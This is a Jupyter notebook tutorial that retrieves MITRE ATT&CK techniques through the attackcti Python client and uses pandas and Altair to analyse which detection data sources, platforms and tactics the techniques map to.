MITRE ATT&CK PYTHON CLIENT: Data Sources¶

Goals:¶

Access ATT&CK data sources in STIX format via a public TAXII server
Learn to interact with ATT&CK data all at once
Explore and idenfity patterns in the data retrieved
Learn more about ATT&CK data sources

1. ATT&CK Python Client Installation¶

You can install it via PIP: pip install attackcti

2. Import ATT&CK API Client¶

In [1]:

from attackcti import attack_client

3. Import Extra Libraries¶

In [2]:

from pandas import *
from pandas.io.json import json_normalize

import numpy as np

import altair as alt

import itertools

4. Initialize ATT&CK Client Class¶

In [3]:

lift = attack_client()

5. Getting Information About Techniques¶

Getting ALL ATT&CK Techniques

In [4]:

all_techniques = lift.get_all_techniques()

Showing the first technique in our list

In [5]:

all_techniques[0]

Out[5]:

{'type': 'attack-pattern',
 'id': 'attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196',
 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',
 'created': '2018-10-17 00:14:20.652000+00:00',
 'modified': '2018-10-17 00:14:20.652000+00:00',
 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],
 'url': 'https://attack.mitre.org/techniques/T1222',
 'matrix': 'mitre-attack',
 'technique': 'File Permissions Modification',
 'technique_description': "File permissions are commonly managed by discretionary access control lists (DACLs) specified by the file owner. File DACL implementation may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). (Citation: Microsoft DACL May 2018) (Citation: Microsoft File Rights May 2018) (Citation: Unix File Permissions)\n\nAdversaries may modify file permissions/attributes to evade intended DACLs. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) Modifications may include changing specific access rights, which may require taking ownership of a file and/or elevated permissions such as Administrator/root depending on the file's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files. Specific file modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1015), [Logon Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files.",
 'tactic': ['defense-evasion'],
 'technique_id': 'T1222',
 'platform': ['Linux', 'Windows', 'macOS'],
 'data_sources': ['File monitoring',
  'Process Monitoring',
  'Process command-line parameters',
  'Windows event logs'],
 'defense_bypassed': ['File system access controls'],
 'permissions_required': ['User', 'Administrator', 'SYSTEM', 'root'],
 'effective_permissions': None,
 'system_requirements': None,
 'network_requirements': None,
 'remote_support': None,
 'contributors': ['Jan Miller, CrowdStrike'],
 'technique_references': ['https://attack.mitre.org/techniques/T1222',
  'https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces',
  'https://docs.microsoft.com/windows/desktop/fileio/file-security-and-access-rights',
  'https://www.tutorialspoint.com/unix/unix-file-permission.htm',
  'https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100',
  'https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110',
  'https://docs.microsoft.com/windows-server/administration/windows-commands/icacls',
  'https://docs.microsoft.com/windows-server/administration/windows-commands/attrib',
  'https://linux.die.net/man/1/chmod',
  'https://linux.die.net/man/1/chown',
  'https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/',
  'https://docs.microsoft.com/windows-server/administration/windows-commands/takeown',
  'https://docs.microsoft.com/powershell/module/microsoft.powershell.security/set-acl'],
 'detectable_by_common_defenses': None,
 'detectable_explanation': None,
 'difficulty_for_adversary': None,
 'difficulty_explanation': None,
 'tactic_type': None}

Normalizing semi-structured JSON data into a flat table via pandas.io.json.json_normalize

Reference: https://pandas.pydata.org/pandas-docs/stable/generated/pandas.io.json.json_normalize.html

In [6]:

techniques_normalized = json_normalize(all_techniques)

In [7]:

techniques_normalized[0:1]

Out[7]:

	contributors	created	created_by_ref	data_sources	defense_bypassed	detectable_by_common_defenses	detectable_explanation	difficulty_explanation	difficulty_for_adversary	effective_permissions	...	remote_support	system_requirements	tactic	tactic_type	technique	technique_description	technique_id	technique_references	type	url
0	[Jan Miller, CrowdStrike]	2018-10-17 00:14:20.652000+00:00	identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5	[File monitoring, Process Monitoring, Process ...	[File system access controls]	NaN	NaN	NaN	NaN	NaN	...	NaN	NaN	[defense-evasion]	NaN	File Permissions Modification	File permissions are commonly managed by discr...	T1222	[https://attack.mitre.org/techniques/T1222, ht...	attack-pattern	https://attack.mitre.org/techniques/T1222

1 rows × 27 columns

6. Re-indexing Dataframe¶

In [8]:

techniques = techniques_normalized.reindex(['matrix','platform','tactic','technique','technique_id','data_sources'], axis=1)

In [9]:

techniques.head()

Out[9]:

	matrix	platform	tactic	technique	technique_id	data_sources
0	mitre-attack	[Linux, Windows, macOS]	[defense-evasion]	File Permissions Modification	T1222	[File monitoring, Process Monitoring, Process ...
1	mitre-attack	[Windows]	[defense-evasion, execution]	XSL Script Processing	T1220	[Process Monitoring, Process command-line para...
2	mitre-attack	[Windows]	[defense-evasion, execution]	Compiled HTML File	T1223	[File monitoring, Process Monitoring, Process ...
3	mitre-attack	[Windows]	[defense-evasion]	Template Injection	T1221	[Anti-virus, Email gateway, Network intrusion ...
4	mitre-attack	[Windows]	[defense-evasion, persistence]	BITS Jobs	T1197	[API monitoring, Packet capture, Windows event...

In [10]:

print('A total of ',len(techniques),' techniques')

A total of  478  techniques

7. Techniques With and Without Data Sources¶

Using altair python library we can start showing a few charts stacking the number of techniques with or without data sources. Reference: https://altair-viz.github.io/

In [11]:

data_source_distribution = pandas.DataFrame({
    'Techniques': ['Without DS','With DS'],
    'Count of Techniques': [techniques['data_sources'].isna().sum(),techniques['data_sources'].notna().sum()]})
bars = alt.Chart(data_source_distribution).mark_bar().encode(x='Techniques',y='Count of Techniques',color='Techniques').properties(width=200,height=300)
text = bars.mark_text(align='center',baseline='middle',dx=0,dy=-5).encode(text='Count of Techniques')
bars + text

Out[11]:

What is the distribution of techniques based on ATT&CK Matrix?

In [12]:

data = techniques
data['Num_Tech'] = 1
data['Count_DS'] = data['data_sources'].str.len()
data['Ind_DS'] = np.where(data['Count_DS']>0,'With DS','Without DS')
data_2 = data.groupby(['matrix','Ind_DS'])['technique'].count()
data_3 = data_2.to_frame().reset_index()
data_3

Out[12]:

	matrix	Ind_DS	technique
0	mitre-attack	With DS	219
1	mitre-attack	Without DS	4
2	mitre-mobile-attack	Without DS	81
3	mitre-pre-attack	Without DS	174

In [13]:

alt.Chart(data_3).mark_bar().encode(x='technique', y='Ind_DS', color='matrix').properties(height = 200)

Out[13]:

What are those mitre-attack techniques without data sources?

In [14]:

data[(data['matrix']=='mitre-attack') & (data['Ind_DS']=='Without DS')]

Out[14]:

	matrix	platform	tactic	technique	technique_id	data_sources	Num_Tech	Count_DS	Ind_DS
31	mitre-attack	[Linux, macOS]	[defense-evasion, persistence, command-and-con...	Port Knocking	T1205	NaN	1	NaN	Without DS
67	mitre-attack	[macOS]	[defense-evasion]	Gatekeeper Bypass	T1144	NaN	1	NaN	Without DS
88	mitre-attack	[macOS]	[persistence]	Re-opened Applications	T1164	NaN	1	NaN	Without DS
103	mitre-attack	[Windows]	[discovery]	Peripheral Device Discovery	T1120	NaN	1	NaN	Without DS

Techniques without data sources¶

In [15]:

techniques_without_data_sources=techniques[techniques.data_sources.isnull()].reset_index(drop=True)

In [16]:

techniques_without_data_sources.head()

Out[16]:

	matrix	platform	tactic	technique	technique_id	data_sources	Num_Tech	Count_DS	Ind_DS
0	mitre-attack	[Linux, macOS]	[defense-evasion, persistence, command-and-con...	Port Knocking	T1205	NaN	1	NaN	Without DS
1	mitre-attack	[macOS]	[defense-evasion]	Gatekeeper Bypass	T1144	NaN	1	NaN	Without DS
2	mitre-attack	[macOS]	[persistence]	Re-opened Applications	T1164	NaN	1	NaN	Without DS
3	mitre-attack	[Windows]	[discovery]	Peripheral Device Discovery	T1120	NaN	1	NaN	Without DS
4	mitre-pre-attack	NaN	[technical-information-gathering]	Spearphishing for Information	T1397	NaN	1	NaN	Without DS

In [17]:

print('There are ',techniques['data_sources'].isna().sum(),' techniques without data sources (',"{0:.0%}".format(techniques['data_sources'].isna().sum()/len(techniques)),' of ',len(techniques),' techniques)')

There are  259  techniques without data sources ( 54%  of  478  techniques)

Techniques With Data Sources¶

In [18]:

techniques_with_data_sources=techniques[techniques.data_sources.notnull()].reset_index(drop=True)

In [19]:

techniques_with_data_sources.head()

Out[19]:

	matrix	platform	tactic	technique	technique_id	data_sources	Num_Tech	Count_DS	Ind_DS
0	mitre-attack	[Linux, Windows, macOS]	[defense-evasion]	File Permissions Modification	T1222	[File monitoring, Process Monitoring, Process ...	1	4.0	With DS
1	mitre-attack	[Windows]	[defense-evasion, execution]	XSL Script Processing	T1220	[Process Monitoring, Process command-line para...	1	4.0	With DS
2	mitre-attack	[Windows]	[defense-evasion, execution]	Compiled HTML File	T1223	[File monitoring, Process Monitoring, Process ...	1	3.0	With DS
3	mitre-attack	[Windows]	[defense-evasion]	Template Injection	T1221	[Anti-virus, Email gateway, Network intrusion ...	1	4.0	With DS
4	mitre-attack	[Windows]	[defense-evasion, persistence]	BITS Jobs	T1197	[API monitoring, Packet capture, Windows event...	1	3.0	With DS

In [20]:

print('There are ',techniques['data_sources'].notna().sum(),' techniques with data sources (',"{0:.0%}".format(techniques['data_sources'].notna().sum()/len(techniques)),' of ',len(techniques),' techniques)')

There are  219  techniques with data sources ( 46%  of  478  techniques)

8. Grouping Techniques With Data Sources By Matrix¶

Let's create a graph to represent the number of techniques per matrix:

In [21]:

matrix_distribution = pandas.DataFrame({
    'Matrix': list(techniques_with_data_sources.groupby(['matrix'])['matrix'].count().keys()),
    'Count of Techniques': techniques_with_data_sources.groupby(['matrix'])['matrix'].count().tolist()})
bars = alt.Chart(matrix_distribution).mark_bar().encode(y='Matrix',x='Count of Techniques').properties(width=300,height=100)
text = bars.mark_text(align='center',baseline='middle',dx=10,dy=0).encode(text='Count of Techniques')
bars + text

Out[21]:

All the techniques belong to mitre-attack matrix which is the main Enterprise matrix. Reference: https://attack.mitre.org/wiki/Main_Page

9. Grouping Techniques With Data Sources by Platform¶

First, we need to split the platform column values because a technique might be mapped to more than one platform

In [22]:

techniques_platform=techniques_with_data_sources

attributes_1 = ['platform'] # In attributes we are going to indicate the name of the columns that we need to split

for a in attributes_1:
    s = techniques_platform.apply(lambda x: pandas.Series(x[a]),axis=1).stack().reset_index(level=1, drop=True)
    # "s" is going to be a column of a frame with every value of the list inside each cell of the column "a"
    s.name = a
    # We name "s" with the same name of "a".
    techniques_platform=techniques_platform.drop(a, axis=1).join(s).reset_index(drop=True)
    # We drop the column "a" from "techniques_platform", and then join "techniques_platform" with "s"

# Let's re-arrange the columns from general to specific
techniques_platform_2=techniques_platform.reindex(['matrix','platform','tactic','technique','technique_id','data_sources'], axis=1)

We can now show techniques with data sources mapped to one platform at the time

In [23]:

techniques_platform_2.head()

Out[23]:

	matrix	platform	tactic	technique	technique_id	data_sources
0	mitre-attack	Linux	[defense-evasion]	File Permissions Modification	T1222	[File monitoring, Process Monitoring, Process ...
1	mitre-attack	Windows	[defense-evasion]	File Permissions Modification	T1222	[File monitoring, Process Monitoring, Process ...
2	mitre-attack	macOS	[defense-evasion]	File Permissions Modification	T1222	[File monitoring, Process Monitoring, Process ...
3	mitre-attack	Windows	[defense-evasion, execution]	XSL Script Processing	T1220	[Process Monitoring, Process command-line para...
4	mitre-attack	Windows	[defense-evasion, execution]	Compiled HTML File	T1223	[File monitoring, Process Monitoring, Process ...

Let's create a visualization to show the number of techniques grouped by platform:

In [24]:

platform_distribution = pandas.DataFrame({
    'Platform': list(techniques_platform_2.groupby(['platform'])['platform'].count().keys()),
    'Count of Techniques': techniques_platform_2.groupby(['platform'])['platform'].count().tolist()})
bars = alt.Chart(platform_distribution,height=300).mark_bar().encode(x ='Platform',y='Count of Techniques',color='Platform').properties(width=200)
text = bars.mark_text(align='center',baseline='middle',dx=0,dy=-5).encode(text='Count of Techniques')
bars + text

Out[24]:

In the bar chart above we can see that there are more techniques with data sources mapped to the Windows platform.

10. Grouping Techniques With Data Sources by Tactic¶

Again, first we need to split the tactic column values because a technique might be mapped to more than one tactic:

In [25]:

techniques_tactic=techniques_with_data_sources

attributes_2 = ['tactic'] # In attributes we are going to indicate the name of the columns that we need to split

for a in attributes_2:
    s = techniques_tactic.apply(lambda x: pandas.Series(x[a]),axis=1).stack().reset_index(level=1, drop=True)
    # "s" is going to be a column of a frame with every value of the list inside each cell of the column "a"
    s.name = a
    # We name "s" with the same name of "a".
    techniques_tactic = techniques_tactic.drop(a, axis=1).join(s).reset_index(drop=True)
    # We drop the column "a" from "techniques_tactic", and then join "techniques_tactic" with "s"

# Let's re-arrange the columns from general to specific
techniques_tactic_2=techniques_tactic.reindex(['matrix','platform','tactic','technique','technique_id','data_sources'], axis=1)

We can now show techniques with data sources mapped to one tactic at the time

In [26]:

techniques_tactic_2.head()

Out[26]:

	matrix	platform	tactic	technique	technique_id	data_sources
0	mitre-attack	[Linux, Windows, macOS]	defense-evasion	File Permissions Modification	T1222	[File monitoring, Process Monitoring, Process ...
1	mitre-attack	[Windows]	defense-evasion	XSL Script Processing	T1220	[Process Monitoring, Process command-line para...
2	mitre-attack	[Windows]	execution	XSL Script Processing	T1220	[Process Monitoring, Process command-line para...
3	mitre-attack	[Windows]	defense-evasion	Compiled HTML File	T1223	[File monitoring, Process Monitoring, Process ...
4	mitre-attack	[Windows]	execution	Compiled HTML File	T1223	[File monitoring, Process Monitoring, Process ...

Let's create a visualization to show the number of techniques grouped by tactic:

In [27]:

tactic_distribution = pandas.DataFrame({
    'Tactic': list(techniques_tactic_2.groupby(['tactic'])['tactic'].count().keys()),
    'Count of Techniques': techniques_tactic_2.groupby(['tactic'])['tactic'].count().tolist()}).sort_values(by='Count of Techniques',ascending=True)
bars = alt.Chart(tactic_distribution,width=800,height=300).mark_bar().encode(x ='Tactic',y='Count of Techniques',color='Tactic').properties(width=400)
text = bars.mark_text(align='center',baseline='middle',dx=0,dy=-5).encode(text='Count of Techniques')
bars + text

Out[27]:

Defende-evasion and Persistence are tactics with the highest nummber of techniques with data sources

11. Grouping Techniques With Data Sources by Data Source¶

We need to split the data source column values because a technique might be mapped to more than one data source:

In [28]:

techniques_data_source=techniques_with_data_sources

attributes_3 = ['data_sources'] # In attributes we are going to indicate the name of the columns that we need to split

for a in attributes_3:
    s = techniques_data_source.apply(lambda x: pandas.Series(x[a]),axis=1).stack().reset_index(level=1, drop=True)
    # "s" is going to be a column of a frame with every value of the list inside each cell of the column "a"
    s.name = a
    # We name "s" with the same name of "a".
    techniques_data_source = techniques_data_source.drop(a, axis=1).join(s).reset_index(drop=True)
    # We drop the column "a" from "techniques_data_source", and then join "techniques_data_source" with "s"

# Let's re-arrange the columns from general to specific
techniques_data_source_2 = techniques_data_source.reindex(['matrix','platform','tactic','technique','technique_id','data_sources'], axis=1)

# We are going to edit some names inside the dataframe to improve the consistency:
techniques_data_source_3 = techniques_data_source_2.replace(['Process monitoring','Application logs'],['Process Monitoring','Application Logs'])

We can now show techniques with data sources mapped to one data source at the time

In [29]:

techniques_data_source_3.head()

Out[29]:

	matrix	platform	tactic	technique	technique_id	data_sources
0	mitre-attack	[Linux, Windows, macOS]	[defense-evasion]	File Permissions Modification	T1222	File monitoring
1	mitre-attack	[Linux, Windows, macOS]	[defense-evasion]	File Permissions Modification	T1222	Process Monitoring
2	mitre-attack	[Linux, Windows, macOS]	[defense-evasion]	File Permissions Modification	T1222	Process command-line parameters
3	mitre-attack	[Linux, Windows, macOS]	[defense-evasion]	File Permissions Modification	T1222	Windows event logs
4	mitre-attack	[Windows]	[defense-evasion, execution]	XSL Script Processing	T1220	Process Monitoring

Let's create a visualization to show the number of techniques grouped by data sources:

In [30]:

data_source_distribution = pandas.DataFrame({
    'Data Source': list(techniques_data_source_3.groupby(['data_sources'])['data_sources'].count().keys()),
    'Count of Techniques': techniques_data_source_3.groupby(['data_sources'])['data_sources'].count().tolist()})
bars = alt.Chart(data_source_distribution,width=800,height=300).mark_bar().encode(x ='Data Source',y='Count of Techniques',color='Data Source').properties(width=1200)
text = bars.mark_text(align='center',baseline='middle',dx=0,dy=-5).encode(text='Count of Techniques')
bars + text

Out[30]:

A few interesting things from the bar chart above:

Process Monitoring, File Monitoring, and Process Command-line parameters are the Data Sources with the highest number of techniques
There are some data source names that include string references to Windows such as PowerShell, Windows and wmi

12. Most Relevant Groups Of Data Sources Per Technique¶

Number Of Data Sources Per Technique¶

Although identifying the data sources with the highest number of techniques is a good start, they usually do not work alone. You might be collecting Process Monitoring already but you might be still missing a lot of context from a data perspective.

In [31]:

data_source_distribution_2 = pandas.DataFrame({
    'Techniques': list(techniques_data_source_3.groupby(['technique'])['technique'].count().keys()),
    'Count of Data Sources': techniques_data_source_3.groupby(['technique'])['technique'].count().tolist()})

data_source_distribution_3 = pandas.DataFrame({
    'Number of Data Sources': list(data_source_distribution_2.groupby(['Count of Data Sources'])['Count of Data Sources'].count().keys()),
    'Count of Techniques': data_source_distribution_2.groupby(['Count of Data Sources'])['Count of Data Sources'].count().tolist()})

bars = alt.Chart(data_source_distribution_3).mark_bar().encode(x ='Number of Data Sources',y='Count of Techniques').properties(width=500)
text = bars.mark_text(align='center',baseline='middle',dx=0,dy=-5).encode(text='Count of Techniques')
bars + text

Out[31]:

The image above shows you the number data sources needed per techniques according to ATT&CK:

There are 71 techniques that require 3 data sources as enough context to validate the detection of them according to ATT&CK
Only one technique has 12 data sources
One data source only applies to 19 techniques

Let's create subsets of data sources with the data source column defining and using a python function:

In [32]:

# https://stackoverflow.com/questions/26332412/python-recursive-function-to-display-all-subsets-of-given-set
def subs(l):
    res = []
    for i in range(1, len(l) + 1):
        for combo in itertools.combinations(l, i):
            res.append(list(combo))
    return res

Before applying the function, we need to use lowercase data sources names and sort data sources names to improve consistency:

In [33]:

df = techniques_with_data_sources[['data_sources']]

In [34]:

for index, row in df.iterrows():
    row["data_sources"]=[x.lower() for x in row["data_sources"]]
    row["data_sources"].sort()

In [35]:

df.head()

Out[35]:

	data_sources
0	[file monitoring, process command-line paramet...
1	[dll monitoring, process command-line paramete...
2	[file monitoring, process command-line paramet...
3	[anti-virus, email gateway, network intrusion ...
4	[api monitoring, packet capture, windows event...

Let's apply the function and split the subsets column:

In [36]:

df['subsets']=df['data_sources'].apply(subs)

C:\Users\lucho\Anaconda3\lib\site-packages\ipykernel_launcher.py:1: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead

See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
  """Entry point for launching an IPython kernel.

In [37]:

df.head()

Out[37]:

	data_sources	subsets
0	[file monitoring, process command-line paramet...	[[file monitoring], [process command-line para...
1	[dll monitoring, process command-line paramete...	[[dll monitoring], [process command-line param...
2	[file monitoring, process command-line paramet...	[[file monitoring], [process command-line para...
3	[anti-virus, email gateway, network intrusion ...	[[anti-virus], [email gateway], [network intru...
4	[api monitoring, packet capture, windows event...	[[api monitoring], [packet capture], [windows ...

We need to split the subsets column values:

In [38]:

techniques_with_data_sources_preview = df

In [39]:

attributes_4 = ['subsets']

for a in attributes_4:
    s = techniques_with_data_sources_preview.apply(lambda x: pandas.Series(x[a]),axis=1).stack().reset_index(level=1, drop=True)
    s.name = a
    techniques_with_data_sources_preview = techniques_with_data_sources_preview.drop(a, axis=1).join(s).reset_index(drop=True)
    
techniques_with_data_sources_subsets = techniques_with_data_sources_preview.reindex(['data_sources','subsets'], axis=1)

In [40]:

techniques_with_data_sources_subsets.head()

Out[40]:

	data_sources	subsets
0	[file monitoring, process command-line paramet...	[file monitoring]
1	[file monitoring, process command-line paramet...	[process command-line parameters]
2	[file monitoring, process command-line paramet...	[process monitoring]
3	[file monitoring, process command-line paramet...	[windows event logs]
4	[file monitoring, process command-line paramet...	[file monitoring, process command-line paramet...

Let's add three columns to analyse the dataframe: subsets_name (Changing Lists to Strings), subsets_number_elements ( Number of data sources per subset) and number_data_sources_per_technique

In [41]:

techniques_with_data_sources_subsets['subsets_name']=techniques_with_data_sources_subsets['subsets'].apply(lambda x: ','.join(map(str, x)))
techniques_with_data_sources_subsets['subsets_number_elements']=techniques_with_data_sources_subsets['subsets'].str.len()
techniques_with_data_sources_subsets['number_data_sources_per_technique']=techniques_with_data_sources_subsets['data_sources'].str.len()

In [42]:

techniques_with_data_sources_subsets.head()

Out[42]:

	data_sources	subsets	subsets_name	subsets_number_elements	number_data_sources_per_technique
0	[file monitoring, process command-line paramet...	[file monitoring]	file monitoring	1	4
1	[file monitoring, process command-line paramet...	[process command-line parameters]	process command-line parameters	1	4
2	[file monitoring, process command-line paramet...	[process monitoring]	process monitoring	1	4
3	[file monitoring, process command-line paramet...	[windows event logs]	windows event logs	1	4
4	[file monitoring, process command-line paramet...	[file monitoring, process command-line paramet...	file monitoring,process command-line parameters	2	4

As it was described above, we need to find grups pf data sources, so we are going to filter out all the subsets with only one data source:

In [43]:

subsets = techniques_with_data_sources_subsets

subsets_ok=subsets[subsets.subsets_number_elements != 1]

In [44]:

subsets_ok.head()

Out[44]:

	data_sources	subsets	subsets_name	subsets_number_elements	number_data_sources_per_technique
4	[file monitoring, process command-line paramet...	[file monitoring, process command-line paramet...	file monitoring,process command-line parameters	2	4
5	[file monitoring, process command-line paramet...	[file monitoring, process monitoring]	file monitoring,process monitoring	2	4
6	[file monitoring, process command-line paramet...	[file monitoring, windows event logs]	file monitoring,windows event logs	2	4
7	[file monitoring, process command-line paramet...	[process command-line parameters, process moni...	process command-line parameters,process monito...	2	4
8	[file monitoring, process command-line paramet...	[process command-line parameters, windows even...	process command-line parameters,windows event ...	2	4

Finally, we calculate the most relevant groups of data sources (Top 15):

In [45]:

subsets_graph = subsets_ok.groupby(['subsets_name'])['subsets_name'].count().to_frame(name='subsets_count').sort_values(by='subsets_count',ascending=False)[0:15]

In [46]:

subsets_graph

Out[46]:

	subsets_count
subsets_name
process command-line parameters,process monitoring	78
file monitoring,process monitoring	68
file monitoring,process command-line parameters	44
file monitoring,process command-line parameters,process monitoring	37
process monitoring,process use of network	32
api monitoring,process monitoring	30
process monitoring,windows registry	27
packet capture,process use of network	20
packet capture,process monitoring	19
netflow/enclave netflow,process monitoring	18
packet capture,process monitoring,process use of network	16
netflow/enclave netflow,packet capture	16
netflow/enclave netflow,process use of network	16
process monitoring,windows event logs	15
network protocol analysis,process use of network	15

In [47]:

subsets_graph_2 = pandas.DataFrame({
    'Data Sources': list(subsets_graph.index),
    'Count of Techniques': subsets_graph['subsets_count'].tolist()})

bars = alt.Chart(subsets_graph_2).mark_bar().encode(x ='Data Sources', y ='Count of Techniques', color='Data Sources').properties(width=500)
text = bars.mark_text(align='center',baseline='middle',dx= 0,dy=-5).encode(text='Count of Techniques')
bars + text

Out[47]:

Group (Process Monitoring - Process Command-line parameters) is the is the group of data sources with the highest number of techniques. This group of data sources are suggested to hunt 78 techniques

14. Let's Split all the Information About Techniques With Data Sources Defined: Matrix, Platform, Tactic and Data Source¶

Let's split all the relevant columns of the dataframe:

In [48]:

techniques_data = techniques_with_data_sources

attributes = ['platform','tactic','data_sources'] # In attributes we are going to indicate the name of the columns that we need to split

for a in attributes:
    s = techniques_data.apply(lambda x: pandas.Series(x[a]),axis=1).stack().reset_index(level=1, drop=True)
    # "s" is going to be a column of a frame with every value of the list inside each cell of the column "a"
    s.name = a
    # We name "s" with the same name of "a".
    techniques_data=techniques_data.drop(a, axis=1).join(s).reset_index(drop=True)
    # We drop the column "a" from "techniques_data", and then join "techniques_data" with "s"

# Let's re-arrange the columns from general to specific
techniques_data_2=techniques_data.reindex(['matrix','platform','tactic','technique','technique_id','data_sources'], axis=1)

# We are going to edit some names inside the dataframe to improve the consistency:
techniques_data_3 = techniques_data_2.replace(['Process monitoring','Application logs'],['Process Monitoring','Application Logs'])

techniques_data_3.head()

Out[48]:

	matrix	platform	tactic	technique	technique_id	data_sources
0	mitre-attack	Linux	defense-evasion	File Permissions Modification	T1222	File monitoring
1	mitre-attack	Linux	defense-evasion	File Permissions Modification	T1222	Process Monitoring
2	mitre-attack	Linux	defense-evasion	File Permissions Modification	T1222	Process command-line parameters
3	mitre-attack	Linux	defense-evasion	File Permissions Modification	T1222	Windows event logs
4	mitre-attack	Windows	defense-evasion	File Permissions Modification	T1222	File monitoring

Do you remember data sources names with a reference to Windows? After splitting the dataframe by platforms, tactics and data sources, are there any macOC or linux techniques that consider windows data sources? Let's identify those rows:

In [49]:

# After splitting the rows of the dataframe, there are some values that relate windows data sources with platforms like linux and masOS.
# We need to identify those rows
conditions = [(techniques_data_3['platform']=='Linux')&(techniques_data_3['data_sources'].str.contains('windows',case=False)== True),
             (techniques_data_3['platform']=='macOS')&(techniques_data_3['data_sources'].str.contains('windows',case=False)== True),
             (techniques_data_3['platform']=='Linux')&(techniques_data_3['data_sources'].str.contains('powershell',case=False)== True),
             (techniques_data_3['platform']=='macOS')&(techniques_data_3['data_sources'].str.contains('powershell',case=False)== True),
             (techniques_data_3['platform']=='Linux')&(techniques_data_3['data_sources'].str.contains('wmi',case=False)== True),
             (techniques_data_3['platform']=='macOS')&(techniques_data_3['data_sources'].str.contains('wmi',case=False)== True)]
# In conditions we indicate a logical test

choices = ['NO OK','NO OK','NO OK','NO OK','NO OK','NO OK']
# In choices, we indicate the result when the logical test is true

techniques_data_3['Validation'] = np.select(conditions,choices,default='OK')
# We add a column "Validation" to "techniques_data_3" with the result of the logical test. The default value is going to be "OK"

What is the inconsistent data?

In [50]:

techniques_analysis_data_no_ok = techniques_data_3[techniques_data_3.Validation == 'NO OK']
# Finally, we are filtering all the values with NO OK

techniques_analysis_data_no_ok.head()

Out[50]:

	matrix	platform	tactic	technique	technique_id	data_sources	Validation
3	mitre-attack	Linux	defense-evasion	File Permissions Modification	T1222	Windows event logs	NO OK
11	mitre-attack	macOS	defense-evasion	File Permissions Modification	T1222	Windows event logs	NO OK
95	mitre-attack	Linux	defense-evasion	Exploitation for Defense Evasion	T1211	Windows Error Reporting	NO OK
101	mitre-attack	macOS	defense-evasion	Exploitation for Defense Evasion	T1211	Windows Error Reporting	NO OK
131	mitre-attack	Linux	lateral-movement	Exploitation of Remote Services	T1210	Windows Error Reporting	NO OK

In [51]:

print('There are ',len(techniques_analysis_data_no_ok),' rows with inconsistent data')

There are  32  rows with inconsistent data

What is the impact of this inconsistent data from a platform and data sources perspective?

In [52]:

df = techniques_with_data_sources

attributes = ['platform','data_sources']

for a in attributes:
    s = df.apply(lambda x: pandas.Series(x[a]),axis=1).stack().reset_index(level=1, drop=True)
    s.name = a
    df=df.drop(a, axis=1).join(s).reset_index(drop=True)
    
df_2=df.reindex(['matrix','platform','tactic','technique','technique_id','data_sources'], axis=1)
df_3 = df_2.replace(['Process monitoring','Application logs'],['Process Monitoring','Application Logs'])

conditions = [(df_3['data_sources'].str.contains('windows',case=False)== True),
              (df_3['data_sources'].str.contains('powershell',case=False)== True),
              (df_3['data_sources'].str.contains('wmi',case=False)== True)]

choices = ['Windows','Windows','Windows']

df_3['Validation'] = np.select(conditions,choices,default='Other')
df_3['Num_Tech'] = 1
df_4 = df_3[df_3.Validation == 'Windows']
df_5 = df_4.groupby(['data_sources','platform'])['technique'].nunique()
df_6 = df_5.to_frame().reset_index()

In [53]:

alt.Chart(df_6).mark_bar().encode(x=alt.X('technique', stack="normalize"),    y='data_sources',    color='platform').properties(height=200)

Out[53]:

There are techniques that consider Windows Error Reporting, Windows Registry, and Windows event logs as data sources and they also consider platforms like Linux and masOS. We do not need to consider this rows because those data sources can only be managed at a Windows environment. These are the techniques that we should not consider in our data base:

In [54]:

techniques_analysis_data_no_ok[['technique','data_sources']].drop_duplicates().sort_values(by='data_sources',ascending=True)

Out[54]:

	technique	data_sources
1792	Credential Dumping	PowerShell logs
95	Exploitation for Defense Evasion	Windows Error Reporting
131	Exploitation of Remote Services	Windows Error Reporting
238	Exploitation for Credential Access	Windows Error Reporting
1186	Exploitation for Privilege Escalation	Windows Error Reporting
987	Disabling Security Tools	Windows Registry
1113	Third-party Software	Windows Registry
1282	Input Capture	Windows Registry
1307	Process Injection	Windows Registry
3	File Permissions Modification	Windows event logs
571	Create Account	Windows event logs
1166	Indicator Removal on Host	Windows event logs
1583	Obfuscated Files or Information	Windows event logs

Without considering this inconsistent data, the final dataframe is:

In [55]:

techniques_analysis_data_ok = techniques_data_3[techniques_data_3.Validation == 'OK']
techniques_analysis_data_ok.head()

Out[55]:

	matrix	platform	tactic	technique	technique_id	data_sources	Validation
0	mitre-attack	Linux	defense-evasion	File Permissions Modification	T1222	File monitoring	OK
1	mitre-attack	Linux	defense-evasion	File Permissions Modification	T1222	Process Monitoring	OK
2	mitre-attack	Linux	defense-evasion	File Permissions Modification	T1222	Process command-line parameters	OK
4	mitre-attack	Windows	defense-evasion	File Permissions Modification	T1222	File monitoring	OK
5	mitre-attack	Windows	defense-evasion	File Permissions Modification	T1222	Process Monitoring	OK

In [56]:

print('There are ',len(techniques_analysis_data_ok),' rows of data that you can play with')

There are  1790  rows of data that you can play with

15. Getting Techniques by Data Sources¶

This function gets techniques' information that includes specific data sources

In [57]:

from attackcti import attack_client
lift = attack_client()

In [58]:

data_source = 'PROCESS MONITORING'

In [59]:

results = lift.get_techniques_by_datasources(data_source)

In [60]:

len(results)

Out[60]:

In [61]:

data_sources_list = ['pRoceSS MoniTorinG','process commAnd-linE parameters']

In [62]:

results2 = lift.get_techniques_by_datasources(data_sources_list)

In [63]:

len(results2)

Out[63]:

In [64]:

results2[1]

